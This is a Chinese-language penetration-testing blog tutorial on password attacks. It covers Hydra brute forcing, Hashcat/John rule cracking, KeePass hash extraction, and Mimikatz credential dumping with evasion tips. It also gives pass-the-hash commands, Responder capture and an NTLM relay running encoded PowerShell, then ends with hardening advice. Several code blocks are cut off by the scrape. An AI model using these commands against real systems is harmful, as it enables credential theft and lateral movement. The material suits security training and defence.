
密码攻击攻防指南

一、网络服务登录爆破
1.1 SSH/RDP密码爆破
1 | # Hydra基础语法(支持多协议) |
注意事项:
- 推荐使用
-t
参数控制并发线程(默认16) - 爆破成功后自动输出结果,可使用
-o
指定输出文件 - Windows系统建议使用
xfreerdp
验证RDP连接
1.2 HTTP表单爆破
1 | # 基础语法 |
参数说明:
^USER^
和^PASS^
为占位符- 失败特征需通过分析响应报文确定
- 建议使用
-V
参数显示详细输出
二、本地密码爆破与规则优化
2.1 工具链组合
1 | flowchart TD |
工具选择:
John
:适合快速破解简单密码,支持规则扩展Hashcat
:GPU加速,支持模式更多(包括最新加密算法)
2.2 密码规则语法
1 | # 示例规则文件 myrules.rule |
常用操作符:
:
规则起始符c
首字母大写$
尾部追加字符?l
插入小写字母sXY
替换X为Y
2.3 Keepass破解
1 | # 提取哈希 |
三、NTLM攻击体系
3.1 哈希获取技术
1 | # Mimikatz标准流程 |
防御规避:
- 使用内存加载执行:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
- 配合进程注入技术绕过杀软
3.2 哈希传递攻击
SMB协议利用:
1 | smbclient //192.168.1.50/C$ -U Administrator --pw-nt-hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
命令执行:
1 | # psexec横向移动 |
3.3 Net-NTLMv2攻击
Responder嗅探:
1 | sudo responder -I eth0 -dwPv |
中继攻击(需禁用SMB签名):
1 | impacket-ntlmrelayx -tf targets.txt -smb2support -c "powershell -enc <BASE64_CMD>" |
PowerShell命令加密:
1 | echo 'Get-Process' | iconv -t UTF-16LE | base64 -w 0 |
四、防御加固建议
网络层防护
- 启用SMB签名(Group Policy: Computer > MS > MS > Require security signature)
- 禁用NTLMv1,强制使用Kerberos认证
系统层加固
1
2
3
4# 启用Credential Guard
Enable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-CredentialGuard
# 限制WMI执行权限
Set-NetFirewallRule -DisplayName "Windows Management Instrumentation (WMI)" -Action Block监控策略
- 监控Event ID 4624(登录类型3的网络登录)
- 建立哈希异常检测机制(如突然出现大量NTLMv1请求)
扩展学习
- Hashcat模式速查表:[hashcat.net/wiki/doku.php?id=example_hashes]
- Impacket官方示例:[github.com/SecureAuthCorp/impacket/tree/master/examples]
- Active Directory安全手册:[adsecurity.org]
- Title: 密码攻击攻防指南
- Author: EnchanterW
- Created at : 2025-03-20 09:00:00
- Updated at : 2025-09-20 20:06:49
- Link: https://enchanter-w.github.io/2025/03/20/13Password_attack/
- License: This work is licensed under CC BY-NC-SA 4.0.
Comments